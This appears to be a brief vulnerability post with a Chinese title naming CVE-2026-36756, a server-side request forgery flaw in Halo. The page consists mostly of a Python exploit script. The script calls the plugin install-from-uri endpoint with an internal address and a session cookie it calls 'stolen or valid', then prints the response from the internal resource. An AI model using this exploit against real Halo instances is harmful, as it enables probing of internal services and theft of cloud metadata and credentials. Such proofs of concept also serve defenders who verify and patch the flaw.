CVE-2026-36756 Halo 存在服务端请求伪造漏洞

import requests # Target configuration target_url = "http://target-halo-instance/plugins/-/install-from-uri" # Internal resource to scan (e.g., local admin panel or cloud metadata) internal_resource = "http://127.0.0.1:8080" # Attacker's credentials (Authentication required) cookies = { "SESSION": "your_stolen_or_valid_session_cookie_here" } # Payload parameters params = { "uri": internal_resource } try: # Send malicious GET request to trigger SSRF print(f"[*] Attempting to scan internal resource: {internal_resource}") response = requests.get(target_url, params=params, cookies=cookies, timeout=10) # Check response based on status code if response.status_code == 200: print("[+] SSRF successful. Response received:") print(response.text[:500]) # Print first 500 chars of response else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")